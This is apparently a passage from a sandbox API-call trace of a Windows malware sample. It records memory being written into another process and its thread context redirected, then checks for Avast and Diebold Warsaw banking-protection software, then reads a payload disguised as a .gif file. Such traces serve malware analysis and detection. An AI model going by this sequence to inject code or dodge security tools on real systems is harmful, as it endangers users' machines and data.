[213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0219.351] ReadProcessMemory (in: hProcess=0x14c, lpBaseAddress=0x7ffdf008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0219.351] VirtualAllocEx (hProcess=0x14c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0219.351] VirtualAlloc (lpAddress=0x1c98000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c98000
[0219.358] WriteProcessMemory (in: hProcess=0x14c, lpBaseAddress=0x400000, lpBuffer=0x1c96124*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1c96124*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0219.370] WriteProcessMemory (in: hProcess=0x14c, lpBaseAddress=0x7ffdf008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0219.371] SetThreadContext (hThread=0x150, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14f888, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0219.371] ResumeThread (hThread=0x150) returned 0x1
[0219.371] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0219.371] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0219.371] GlobalUnlock (hMem=0x95000c) returned 0
[0219.371] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0219.371] GlobalUnlock (hMem=0x950004) returned 0
[0219.380] Sleep (dwMilliseconds=0xe74e)
[0229.391] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0229.392] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0229.392] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0229.392] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0229.392] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158
[0229.392] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0229.392] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0229.392] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0229.392] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0229.394] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0229.394] ReadFile (in: hFile=0x158, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0229.401] CloseHandle (hObject=0x158) returned 1
[0229.402] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.402] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.402] GlobalUnlock (hMem=0x95000c) returned 0
[0229.402] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0229.402] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.403] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.403] GlobalUnlock (hMem=0x95000c) returned 0
[0229.403] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0229.404] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0229.405] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0229.405] GlobalUnlock (hMem=0x95000c) returned 0
[0229.405] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0229.405] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0229.406] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0229.406] GlobalUnlock (hMem=0x95000c) returned 0
[0229.406] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0229.406] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0229.407] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0229.407] GlobalUnlock (hMem=0x95000c) returned 0
[0229.407] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0229.408] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0229.409] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0229.409] GlobalUnlock (hMem=0x95000c) returned 0
[0229.409] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0229.409] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.410] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.410] GlobalUnlock (hMem=0x95000c) returned 0
[0229.410] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0229.411] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.412] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.412] GlobalUnlock (hMem=0x95000c) returned 0
[0229.412] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0229.412] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.413] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.413] GlobalUnlock (hMem=0x95000c) returned 0
[0229.413] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0229.413] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.414] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.414] GlobalUnlock (hMem=0x95000c) returned 0
[0229.414] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0229.414] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.415] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.415] GlobalUnlock (hMem=0x95000c) returned 0
[0229.415] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0229.415] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.416] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.416] GlobalUnlock (hMem=0x95000c) returned 0
[0229.416] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0229.416] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.417] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.417] GlobalUnlock (hMem=0x95000c) returned 0
[0229.417] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0229.417] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.418] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.418] GlobalUnlock (hMem=0x95000c) returned 0
[0229.418] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0229.418] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.419] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.419] GlobalUnlock (hMem=0x95000c) returned 0
[0229.419] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0229.419] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.419] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.419] GlobalUnlock (hMem=0x95000c) returned 0
[0229.419] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0229.421] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0229.422] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0229.422] GlobalUnlock (hMem=0x95000c) returned 0
[0229.422] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0229.422] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0229.423] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0229.423] GlobalUnlock (hMem=0x95000c) returned 0
[0229.423] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0229.425] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0229.426] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0229.426] GlobalUnlock (hMem=0x95000c) returned 0
[0229.426] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0229.426] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.427] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.427] GlobalUnlock (hMem=0x95000c) returned 0
[0229.427] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0229.427] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.427] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.427] GlobalUnlock (hMem=0x95000c) returned 0
[0229.427] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0229.428] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.428] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.428] GlobalUnlock (hMem=0x95000c) returned 0
[0229.428] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0229.428] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.429] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.429] GlobalUnlock (hMem=0x95000c) returned 0
[0229.429] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0229.429] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.430] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.430] GlobalUnlock (hMem=0x95000c) returned 0
[0229.430] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0229.430] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.431] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.431] GlobalUnlock (hMem=0x95000c) returned 0
[0229.431] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0229.431] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.432] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.432] GlobalUnlock (hMem=0x95000c) returned 0
[0229.432] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0229.432] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.433] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.433] GlobalUnlock (hMem=0x95000c) returned 0
[0229.433] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0229.433] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.434] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.434] GlobalUnlock (hMem=0x95000c) returned 0
[0229.434] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0229.434] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.435] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.435] GlobalUnlock (hMem=0x95000c) returned 0
[0229.435] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0229.435] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.436] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.436] GlobalUnlock (hMem=0x95000c) returned 0
[0229.436] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0229.436] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.437] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.437] GlobalUnlock (hMem=0x95000c) returned 0
[0229.437] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0229.437] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.437] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.437] GlobalUnlock (hMem=0x95000c) returned 0
[0229.437] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0229.437] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.438] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.438] GlobalUnlock (hMem=0x95000c) returned 0
[0229.438] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0229.438] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.439] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.439] GlobalUnlock (hMem=0x95000c) returned 0
[0229.439] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0229.439] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.440] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.440] GlobalUnlock (hMem=0x95000c) returned 0
[0229.440] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0229.440] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0229.441] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0229.441] GlobalUnlock (hMem=0x95000c) returned 0
